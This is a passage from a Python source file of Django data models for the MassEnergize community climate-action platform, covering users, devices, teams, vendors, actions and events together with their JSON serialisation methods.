real_estate_unit__community=self, status="DONE" ).prefetch_related("action__calculator_action") else: community_members = CommunityMember.objects.filter( is_deleted=False, community=self ).select_related("user") users = [cm.user for cm in community_members] members_count = community_members.count() goal["organic_attained_number_of_households"] = members_count done_actions = UserActionRel.objects.filter( user__in=users, status="DONE" ).prefetch_related("action__calculator_action") goal["organic_attained_number_of_actions"] = done_actions.count() carbon_footprint_reduction = 0 for actionRel in done_actions: if actionRel.action and actionRel.action.calculator_action: carbon_footprint_reduction += ( actionRel.action.calculator_action.average_points ) goal["organic_attained_carbon_footprint_reduction"] = carbon_footprint_reduction locations = "" for loc in self.locations.all(): if locations != "": locations += ", " if self.geography_type == "ZIPCODE": l = loc.zipcode elif self.geography_type == "CITY": l = loc.city elif self.geography_type == "COUNTY": l = loc.county elif self.geography_type == "STATE": l = loc.state elif self.geography_type == "COUNTRY": l = loc.country else: l = loc.zipcode locations += l return { "id": self.id, "name": self.name, "subdomain": self.subdomain, "website": website, "owner_name": self.owner_name, "owner_email": self.owner_email, "owner_phone_number": self.owner_phone_number, "goal": goal, "about_community": self.about_community, "logo": get_json_if_not_none(self.logo), "favicon": get_json_if_not_none(self.favicon), "location": self.location, "is_approved": self.is_approved, "is_published": self.is_published, "is_geographically_focused": self.is_geographically_focused, "banner": get_json_if_not_none(self.banner), "created_at": self.created_at, "updated_at": self.updated_at, "more_info": self.more_info, "admins": admins, "geography_type": self.geography_type, "locations": locations, } class Meta: verbose_name_plural = "Communities" db_table = "communities" class RealEstateUnit(models.Model): """ A class used to represent a Real Estate Unit. Attributes ---------- unit_type : str The type of this unit eg. 
Residential, Commercial, etc
    location: Location
      the geographic address or location of this real estate unit
    created_at: DateTime
      The date and time that this real estate unit was added
    updated_at: DateTime
      The date and time of the last time any updates were made to the
      information about this real estate unit
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN)
    unit_type = models.CharField(
        max_length=TINY_STR_LEN, choices=CHOICES.get("REAL_ESTATE_TYPES", {}).items()
    )
    community = models.ForeignKey(
        Community, null=True, on_delete=models.SET_NULL, blank=True
    )
    location = models.JSONField(blank=True, null=True)

    # added 1/28/21 - redundant to location, address will have Zip code, defining
    # which community the REU is in
    address = models.ForeignKey(Location, null=True, on_delete=models.SET_NULL)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    is_deleted = models.BooleanField(default=False, blank=True)

    def is_commercial(self):
        return self.unit_type == "C"

    def is_residential(self):
        return self.unit_type == "R"

    def __str__(self):
        return f"{self.community}|{self.unit_type}|{self.name}"

    def simple_json(self):
        # return model_to_dict(self)
        res = model_to_dict(self)
        res["location"] = get_json_if_not_none(self.address)
        return res

    def full_json(self):
        return self.simple_json()

    class Meta:
        db_table = "real_estate_units"


class Role(models.Model):
    """
    A class used to represent a Role for users on the MassEnergize Platform

    Attributes
    ----------
    name : str
      name of the role
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(
        max_length=TINY_STR_LEN,
        choices=CHOICES.get("ROLE_TYPES", {}).items(),
        unique=True,
    )
    description = models.TextField(max_length=LONG_STR_LEN, blank=True)
    is_deleted = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return CHOICES.get("ROLE_TYPES", {})[self.name]

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("name",)
        db_table = "roles"


class UserProfile(models.Model):
    """
    A class used to represent a MassEnergize User

    Note: Authentication is handled by firebase so we just need emails

    Attributes
    ----------
    email : str
      email of the user.  Should be unique.
    user_info: JSON
      a JSON representing the name, bio, etc for this user.
    bio:
      A short biography of this user
    is_super_admin: boolean
      True if this user is a super admin, False otherwise
    is_community_admin: boolean
      True if this user is an admin for a community, False otherwise
    is_vendor: boolean
      True if this user is a vendor, False otherwise
    other_info: JSON
      any other dynamic information we would like to store about this UserProfile
    created_at: DateTime
      The date and time that this user profile was added
    updated_at: DateTime
      The date and time of the last time any updates were made to the
      information about this user profile
    #TODO: roles field: if we have this do we need is_superadmin etc? also why
    # not just one?
why many to many """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) full_name = models.CharField(max_length=SHORT_STR_LEN, null=True) profile_picture = models.ForeignKey( Media, on_delete=models.SET_NULL, blank=True, null=True, related_name="profile_picture", ) preferred_name = models.CharField(max_length=SHORT_STR_LEN, null=True) email = models.EmailField(unique=True, db_index=True) user_info = models.JSONField(blank=True, null=True) real_estate_units = models.ManyToManyField( RealEstateUnit, related_name="user_real_estate_units", blank=True ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) communities = models.ManyToManyField(Community, blank=True) roles = models.ManyToManyField(Role, blank=True) is_super_admin = models.BooleanField(default=False, blank=True) is_community_admin = models.BooleanField(default=False, blank=True) is_vendor = models.BooleanField(default=False, blank=True) other_info = models.JSONField(blank=True, null=True) accepts_terms_and_conditions = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) preferences = models.JSONField(default=dict, null=True, blank=True) visit_log = models.JSONField(default=list, null=True, blank=True) def __str__(self): return self.email def info(self): return model_to_dict(self, ["id", "email", "full_name"]) def simple_json(self): res = model_to_dict( self, [ "id", "full_name", "preferred_name", "email", "is_super_admin", "is_community_admin", ], ) res["joined"] = self.created_at.date() res["user_info"] = self.user_info res["profile_picture"] = get_json_if_not_none(self.profile_picture) res["communities"] = [ c.community.name for c in CommunityMember.objects.filter(user=self) ] res["households"] = [h.simple_json() for h in self.real_estate_units.all()] return res def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old fomat to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def full_json(self): team_members = [t.team.info() for t in TeamMember.objects.filter(user=self)] community_members = CommunityMember.objects.filter(user=self) communities = [cm.community.info() for cm in community_members] # admin_at = [ // TODO: Remove -> because we stopped using this, and started using CommunityAdminGroupBelow # cm.community.info() # for cm in CommunityMember.objects.filter(user=self, is_admin=True) # ] data = model_to_dict( self, exclude=["real_estate_units", "communities", "roles"] ) data["joined"] = self.created_at.date() admin_at = [ get_json_if_not_none(c.community) for c in self.communityadmingroup_set.all() ] data["households"] = [h.simple_json() for h in self.real_estate_units.all()] data["goal"] = get_json_if_not_none(self.goal) data["communities"] = communities data["admin_at"] = admin_at data["teams"] = team_members data["profile_picture"] = get_json_if_not_none(self.profile_picture) data["visit_log"] = self.visit_log return data class Meta: db_table = 
"user_profiles" ordering = ("-created_at",) class UserMediaUpload(models.Model): """A class that creates a relationship between a user(all user kinds) on the platform and media they have uploaded""" id = models.AutoField(primary_key=True) user = models.ForeignKey( UserProfile, null=True, related_name="uploads", on_delete=models.DO_NOTHING, ) communities = models.ManyToManyField( Community, related_name="community_uploads", ) media = models.OneToOneField( Media, null=True, related_name="user_upload", on_delete=models.CASCADE, ) is_universal = BooleanField( default=False ) # True value here means image is available to EVERYONE, and EVERY COMMUNITY settings = models.JSONField(null=True, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{str(self.id)} - {self.media.name} from {self.user.preferred_name or self.user.full_name} " def simple_json(self): res = model_to_dict( self, ["settings", "media", "created_at", "id", "is_universal"] ) res["user"] = get_summary_info(self.user) res["image"] = get_json_if_not_none(self.media) res["communities"] = [get_summary_info(com) for com in self.communities.all()] return res def full_json(self): return self.simple_json() class DeviceProfile(models.Model): """ A class used to represent a MassEnergize User's Device Attributes ---------- user_profiles : JSON A JSON object containing all user ids (as foreign keys) for any users asociated with this device. IP_address: Char The asociated IP address with this device. device_type: Char The type of device we see from the HTTP request. operating_system: The operating system we see from the HTTP request. browser: The browser we see from the HTTP request. visit_log: A JSON object containing a history of dates. Activity will only be logged here if there is a user attached to the device and they are logged in. 
    #TODO:
    """

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
    user_profiles = models.ManyToManyField(UserProfile, blank=True)
    ip_address = models.CharField(max_length=SHORT_STR_LEN, null=True)
    location = models.ManyToManyField(Location, blank=True)
    device_type = models.CharField(max_length=SHORT_STR_LEN, null=True)
    operating_system = models.CharField(max_length=SHORT_STR_LEN, null=True)
    browser = models.CharField(max_length=SHORT_STR_LEN, null=True)
    visit_log = models.JSONField(default=list, null=True, blank=True)
    is_deleted = models.BooleanField(default=False, blank=True)

    def get_user_profiles(self):
        # user_profiles is a ManyToMany relation, so return the related users directly
        return list(self.user_profiles.all())

    def get_visit_log(self):
        # visit_log is a JSONField and is already deserialized
        return self.visit_log

    def update_device_location(self, location):
        self.location.add(location)

    def update_user_profiles(self, user):
        self.user_profiles.add(user)

    def update_visit_log(self, date_time):
        try:
            new_format = "%Y/%m/%d"
            date = date_time.strftime(new_format)
            # We adapt the old format to the new one
            if type(self.visit_log) == dict:
                old = self.visit_log
                new = []
                for day in old.keys():
                    old_format = "%d/%m/%Y"
                    dt_object = datetime.datetime.strptime(day, old_format)
                    day = dt_object.strftime(new_format)
                    new.append(day)
                self.visit_log = new
            if type(self.visit_log) == list:
                if len(self.visit_log) > 0:
                    if date != self.visit_log[-1]:
                        self.visit_log.append(date)
                else:
                    self.visit_log.append(date)
        except Exception as e:
            print(e)
            return None, e

    def simple_json(self):
        res = model_to_dict(
            self,
            [
                "id",
                "ip_address",
                "device_type",
                "operating_system",
                "browser",
                "visit_log",
                "is_deleted",
            ],
        )
        res["user_profiles"] = [u.simple_json() for u in self.user_profiles.all()]
        return res

    def full_json(self):
        return self.simple_json()


class CommunityMember(models.Model):
    id = models.AutoField(primary_key=True)
    community = models.ForeignKey(Community, on_delete=models.CASCADE)
    user = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    is_admin = models.BooleanField(blank=True, default=False)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    is_deleted = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return f"{self.user} is {'an ADMIN' if self.is_admin else 'a MEMBER'} in Community({self.community})"

    def simple_json(self):
        res = model_to_dict(self, ["id", "is_admin"])
        res["community"] = get_summary_info(self.community)
        res["user"] = get_summary_info(self.user)
        return res

    def full_json(self):
        return self.simple_json()

    class Meta:
        db_table = "community_members_and_admins"
        unique_together = [["community", "user"]]
        ordering = ("-created_at",)


class Subdomain(models.Model):
    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN, unique=True)
    community = models.ForeignKey(
        Community,
        on_delete=models.SET_NULL,
        null=True,
        related_name="subdomain_community",
    )
    in_use = models.BooleanField(default=False, blank=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self):
        return f"{self.community} - {self.name}"

    def simple_json(self):
        res = model_to_dict(self, ["id", "in_use", "name", "created_at", "updated_at"])
        res["community"] = get_summary_info(self.community)
        return res

    def full_json(self):
        return self.simple_json()

    class Meta:
        db_table = "subdomains"


class CustomCommunityWebsiteDomain(models.Model):
    id = models.AutoField(primary_key=True)
    website = models.CharField(max_length=SHORT_STR_LEN, unique=True)
    community = models.ForeignKey(
        Community,
on_delete=models.SET_NULL, null=True, related_name="community_website", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.website}-{self.community}" def simple_json(self): res = model_to_dict(self, ["id", "website", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "custom_community_website_domain" class Team(models.Model): """ A class used to represent a Team in a community Attributes ---------- name : str name of the team. Need not be unique description: str description of this team admins: ManyToMany administrators for this team members: ManyToMany the team members community: which community this team is a part of logo: Foreign Key to Media file represtenting the logo for this team banner: Foreign Key to Media file represtenting the banner for this team created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) # Team names should be unique globally (Not!) name = models.CharField(max_length=SHORT_STR_LEN) tagline = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) admins = models.ManyToManyField(UserProfile, related_name="team_admins", blank=True) # not used members = models.ManyToManyField( UserProfile, related_name="team_members", blank=True ) # change this from ForeignKey to ManyToManyField to allow team to span communities # rename community to primary_community - this is the one whose cadmin can add/delete other communities, and which is unique with name communities = models.ManyToManyField( Community, related_name="community_teams", blank=True ) primary_community = models.ForeignKey( Community, related_name="primary_community_teams", on_delete=models.CASCADE ) images = models.ManyToManyField( Media, related_name="teams" ) # 0 or more photos - could be a slide show video_link = models.CharField( max_length=LONG_STR_LEN, blank=True ) # allow one video is_closed = models.BooleanField( default=False, blank=True ) # by default, teams are open team_page_options = models.JSONField( blank=True, null=True ) # settable team page options parent = models.ForeignKey( "self", null=True, on_delete=models.SET_NULL ) # for the case of sub-teams goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_banner", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def is_admin(self, UserProfile): return self.admins.filter(id=UserProfile.id) # def is_member(self, UserProfile): # return self.members.filter(id=UserProfile.id) def __str__(self): return self.name def info(self): return model_to_dict(self, ["id", "name", "tagline", "description"]) def simple_json(self): res = self.info() res["primary_community"] = get_json_if_not_none(self.primary_community) res["logo"] = get_json_if_not_none(self.logo) res["is_closed"] = self.is_closed res["is_published"] = self.is_published 
res["parent"] = get_json_if_not_none(self.parent) return res def full_json(self): data = self.simple_json() # Q: should this be in simple_json? data["communities"] = [c.simple_json() for c in self.communities.all()] data["admins"] = [a.simple_json() for a in self.admins.all()] data["members"] = [m.simple_json() for m in self.members.all()] data["goal"] = get_json_if_not_none(self.goal) data["banner"] = get_json_if_not_none(self.banner) return data class Meta: ordering = ("name",) db_table = "teams" unique_together = [["primary_community", "name"]] class TeamMember(models.Model): id = models.AutoField(primary_key=True) team = models.ForeignKey(Team, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {"an ADMIN" if self.is_admin else "a MEMBER"} in Team({self.team})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "team_members_and_admins" unique_together = [["team", "user"]] class Service(models.Model): """ A class used to represent a Service provided by a Vendor Attributes ---------- name : str name of the service description: str description of this service image: int Foreign Key to a Media file represtenting an image for this service if any icon: str a string description of an icon class for this service if any info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) service_location = models.JSONField(blank=True, null=True) image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict( self, ["id", "name", "description", "service_location", "icon"] ) def full_json(self): return self.simple_json() class Meta: db_table = "services" class ActionProperty(models.Model): """ A class used to represent an Action property. 
    Attributes
    ----------
    name : str
      name of the property
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN, unique=True)
    short_description = models.CharField(max_length=LONG_STR_LEN, blank=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return self.name

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        # delegate to simple_json; calling full_json here would recurse forever
        return self.simple_json()

    class Meta:
        verbose_name_plural = "Properties"
        ordering = ("id",)
        db_table = "action_properties"


class CarbonEquivalency(models.Model):
    """
    Represents a carbon equivalency that can make carbon impact more
    comprehensible to users.

    Attributes
    ----------
    name : str
      Name of the unit used.  E.g. "Tree"
    value: float
      Value is how many pounds per year of CO2 per unit of this.
      Use https://www.epa.gov/energy/greenhouse-gas-equivalencies-calculator
    icon:
      Graphic representing the appropriate equivalency.
    explanation: str
      Additional information on the equivalency.  E.g. "A typical hardwood tree
      can absorb as much as 48 pounds of carbon dioxide per year"
    reference: str
      Source of information used.  Link, book, study, etc.
    date: DateTime
      Timestamp of when the equivalency was last modified.
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=50)
    value = models.FloatField()
    icon = models.CharField(max_length=50)
    title = models.CharField(max_length=40, null=True, blank=True)
    explanation = models.CharField(max_length=100)
    reference = models.CharField(max_length=100)
    date = models.DateTimeField(auto_now=True)

    def __str__(self):
        return self.name

    def simple_json(self):
        return model_to_dict(self)

    def full_json(self):
        return self.simple_json()

    class Meta:
        verbose_name_plural = "CarbonEquivalencies"
        ordering = ("id",)
        db_table = "carbon_equivalencies"


class TagCollection(models.Model):
    """
    A class used to represent a collection of Tags.

    Attributes
    ----------
    name : str
      name of the Tag Collection
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN, unique=True)
    is_global = models.BooleanField(default=False, blank=True)
    allow_multiple = models.BooleanField(default=False)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)
    rank = models.PositiveIntegerField(default=0)

    def __str__(self):
        return self.name

    def simple_json(self):
        res = model_to_dict(self)
        res["tags"] = [t.simple_json() for t in self.tag_set.all()]
        return res

    def full_json(self):
        return self.simple_json()

    class Meta:
        ordering = ("name",)
        db_table = "tag_collections"


class Tag(models.Model):
    """
    A class used to represent a Tag.
It is essentially a string that can be used to describe or group items, actions, etc Attributes ---------- name : str name of the Tag """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) points = models.PositiveIntegerField(null=True, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) tag_collection = models.ForeignKey( TagCollection, null=True, on_delete=models.CASCADE, blank=True ) rank = models.PositiveIntegerField(default=0) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.name, self.tag_collection) def simple_json(self): res = model_to_dict(self) res["order"] = self.rank res["tag_collection_name"] = ( None if not self.tag_collection else self.tag_collection.name ) return res def full_json(self): data = self.simple_json() data["tag_collection"] = get_json_if_not_none(self.tag_collection) return data class Meta: ordering = ("rank",) db_table = "tags" unique_together = [["rank", "name", "tag_collection"]] class Vendor(models.Model): """ A class used to represent a Vendor/Contractor that provides a service associated with any of the actions. Attributes ---------- name : str name of the Vendor description: str description of this service logo: int Foreign Key to Media file represtenting the logo for this Vendor banner: int Foreign Key to Media file represtenting the banner for this Vendor address: int Foreign Key for Location of this Vendor key_contact: int Foreign Key for MassEnergize User that is the key contact for this vendor service_area: str Information about whether this vendor provides services nationally, statewide, county or Town services only properties_services: str Whether this vendor services Residential or Commercial units only onboarding_date: DateTime When this vendor was onboard-ed on the MassEnergize Platform for this community onboarding_contact: Which MassEnergize Staff/User onboard-ed this vendor verification_checklist: contains information about some steps and checks needed for due diligence to be done on this vendor eg. 
Vendor MOU, Reesearch is_verified: boolean When the checklist items are all done and verified then set this as True to confirm this vendor more_info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this Vendor was added created_at: DateTime The date and time of the last time any updates were made to the information about this Vendor """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) phone_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) email = models.EmailField(blank=True, null=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vender_logo", ) banner = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vendor_banner", ) address = models.JSONField(blank=True, null=True) key_contact = models.JSONField(blank=True, null=True) service_area = models.CharField(max_length=SHORT_STR_LEN) service_area_states = models.JSONField(blank=True, null=True) services = models.ManyToManyField(Service, blank=True) properties_serviced = models.JSONField(blank=True, null=True) onboarding_date = models.DateTimeField(auto_now_add=True) onboarding_contact = models.ForeignKey( UserProfile, blank=True, null=True, on_delete=models.SET_NULL, related_name="onboarding_contact", ) verification_checklist = models.JSONField(blank=True, null=True) is_verified = models.BooleanField(default=False, blank=True) location = models.JSONField(blank=True, null=True) more_info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) communities = models.ManyToManyField( Community, blank=True, related_name="community_vendors" ) tags = models.ManyToManyField(Tag, related_name="vendor_tags", blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def info(self): data = model_to_dict( self, ["id", "name", "service_area", "key_contact", "phone_number", "email"] ) data["logo"] = get_json_if_not_none(self.logo) return data def simple_json(self): data = model_to_dict( self, exclude=[ "logo", "banner", "services", "onboarding_contact", "more_info", "services", "communities", ], ) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["tags"] = [t.simple_json() for t in self.tags.all()] data["logo"] = get_json_if_not_none(self.logo) data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact return data def full_json(self): data = model_to_dict( self, exclude=["logo", "banner", "services", "onboarding_contact"] ) data["onboarding_contact"] = get_json_if_not_none(self.onboarding_contact) data["logo"] = get_json_if_not_none(self.logo) data["more_info"] = self.more_info data["tags"] = [t.simple_json() for t in self.tags.all()] data["banner"] = get_json_if_not_none(self.banner) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact data["location"] = self.location return data class Meta: db_table = "vendors" 
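

# Illustrative usage sketch (added for clarity, not part of the original file):
# every model above exposes simple_json() for lightweight listings and
# full_json() for detail views.  The helper below is a hypothetical example of
# how an API layer might consume that convention for vendors; the function name
# and the filter choices are assumptions, not an existing endpoint.
def _example_published_vendors_json():
    """Return lightweight JSON for all published, non-deleted vendors."""
    return [
        v.simple_json()
        for v in Vendor.objects.filter(is_published=True, is_deleted=False)
    ]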
class Action(models.Model):
    """
    A class used to represent an Action that can be taken by a user on this website.

    Attributes
    ----------
    title : str
      A short title for this Action.
    is_global: boolean
      True if this action is a core action that every community should see;
      False otherwise.
    about: str
      More descriptive information about this action.
    steps_to_take: str
      Describes the steps that can be taken by a user for this action
    icon: str
      a string description of the icon class for this action if any
    image: int Media
      a Foreign key to an uploaded media file
    average_carbon_score:
      the average carbon score for this action as given by the carbon calculator
    geographic_area: str
      the Location where this action can be taken
    created_at: DateTime
      The date and time that this action was added
    updated_at: DateTime
      The date and time of the last time any updates were made to the
      information about this action
    """

    id = models.AutoField(primary_key=True)
    title = models.CharField(max_length=SHORT_STR_LEN, db_index=True)
    is_global = models.BooleanField(default=False, blank=True)
    featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True)
    steps_to_take = models.TextField(max_length=LONG_STR_LEN, blank=True)
    deep_dive = models.TextField(max_length=LONG_STR_LEN, blank=True)
    about = models.TextField(max_length=LONG_STR_LEN, blank=True)

    # TODO: this wasn't fully implemented - may remove primary_category
    # this is the single category which points will be recorded in, though
    primary_category = models.ForeignKey(
        Tag, related_name="action_category", on_delete=models.SET_NULL, null=True
    )

    # then - an action could have multiple secondary categories
    tags = models.ManyToManyField(Tag, related_name="action_tags", blank=True)
    geographic_area = models.JSONField(blank=True, null=True)
    icon = models.CharField(max_length=SHORT_STR_LEN, blank=True)
    image = models.ForeignKey(
        Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="actions"
    )
    properties = models.ManyToManyField(ActionProperty, blank=True)
    vendors = models.ManyToManyField(Vendor, blank=True)
    calculator_action = models.ForeignKey(
        CCAction, blank=True, null=True, on_delete=models.SET_NULL
    )
    average_carbon_score = models.TextField(max_length=SHORT_STR_LEN, blank=True)
    community = models.ForeignKey(
        Community, on_delete=models.SET_NULL, null=True, blank=True, db_index=True
    )
    rank = models.PositiveSmallIntegerField(default=0, blank=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return self.title

    def info(self):
        return model_to_dict(self, ["id", "title"])

    def simple_json(self):
        data = model_to_dict(
            self,
            [
                "id",
                "is_published",
                "is_deleted",
                "title",
                "is_global",
                "icon",
                "rank",
                "average_carbon_score",
                "featured_summary",
            ],
        )
        data["image"] = get_json_if_not_none(self.image)
        data["calculator_action"] = get_summary_info(self.calculator_action)
        data["tags"] = [t.simple_json() for t in self.tags.all()]
        data["steps_to_take"] = self.steps_to_take
        data["deep_dive"] = self.deep_dive
        data["about"] = self.about
        data["community"] = get_summary_info(self.community)
        data["vendors"] = [v.info() for v in self.vendors.all()]
        return data

    def full_json(self):
        data = self.simple_json()
        data["is_global"] = self.is_global
        data["steps_to_take"] = self.steps_to_take
        data["about"] = self.about
        data["geographic_area"] = 
self.geographic_area data["properties"] = [p.simple_json() for p in self.properties.all()] data["vendors"] = [v.simple_json() for v in self.vendors.all()] return data class Meta: ordering = ["rank", "title"] db_table = "actions" unique_together = [["title", "community"]] class Event(models.Model): """ A class used to represent an Event. Attributes ---------- name : str name of the event description: str more details about this event start_date_and_time: Datetime when the event starts (both the day and time) end_date_and_time: Datetime when the event ends location: Location where the event is taking place tags: ManyToMany tags on this event to help in easily filtering image: Media Foreign key linking to the image attached to this event. archive: boolean True if this event should be archived is_global: boolean True if this action is an event that every community should see or not. False otherwise. is_recurring: boolean if the event is recurring, this value is True and it has a RecurringPattern instance attached to it. recurring_details: JSON stores information about the recurrence pattern of the event if is_recurring = True """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) description = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) invited_communities = models.ManyToManyField( Community, related_name="invited_communites", blank=True ) start_date_and_time = models.DateTimeField(db_index=True) end_date_and_time = models.DateTimeField(db_index=True) location = models.JSONField(blank=True, null=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="events" ) archive = models.BooleanField(default=False, blank=True) is_global = models.BooleanField(default=False, blank=True) external_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_external_event = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0, blank=True, null=True) is_recurring = models.BooleanField(default=False, blank=True, null=True) recurring_details = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): data = model_to_dict( self, exclude=["tags", "image", "community", "invited_communities"] ) data["start_date_and_time"] = self.start_date_and_time data["end_date_and_time"] = self.end_date_and_time data["tags"] = [t.simple_json() for t in self.tags.all()] data["community"] = get_json_if_not_none(self.community) data["image"] = None if not self.image else self.image.full_json() data["invited_communities"] = [ c.simple_json() for c in self.invited_communities.all() ] data["more_info"] = self.more_info return data def full_json(self): return self.simple_json() class Meta: ordering = ( "rank", "-start_date_and_time", ) db_table = "events" # leaner class that stores information about events that have already passed # in the future, can use this class to revive events that may have been archived class PastEvent(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN) 
    start_date_and_time = models.DateTimeField()
    community = models.ForeignKey(Community, on_delete=models.CASCADE)


class RecurringEventException(models.Model):
    """
    A class used to represent a RESCHEDULING of a recurring event.

    Attributes
    ----------
    event: Event
      stores the recurring event that the exception is attached to
    rescheduled_event: Event
      if the event instance is rescheduled, a new Event is created representing
      the rescheduled event instance
    is_cancelled : boolean
      True if the event has been cancelled by CAdmin
    is_rescheduled: boolean
      True if event has been rescheduled by CAdmin
    former_time: dateTime
      Tells us when the instance was originally scheduled.  Helps us figure out
      when to delete RecurringEventException
    """

    id = models.AutoField(primary_key=True)
    event = models.ForeignKey(
        Event, on_delete=models.CASCADE, related_name="recurring_event"
    )
    rescheduled_event = models.ForeignKey(
        Event, on_delete=models.CASCADE, blank=True, null=True
    )  # shouldn't be this way - blank should be false, but I don't know what to set the default to
    former_time = models.DateTimeField(null=True, blank=True)

    def __str__(self):
        return str(self.id)

    def simple_json(self):
        data = model_to_dict(self, exclude=["event", "rescheduled_event"])
        data["id"] = str(self.id)
        data["former_time"] = str(self.former_time)
        data["event"] = self.event.id
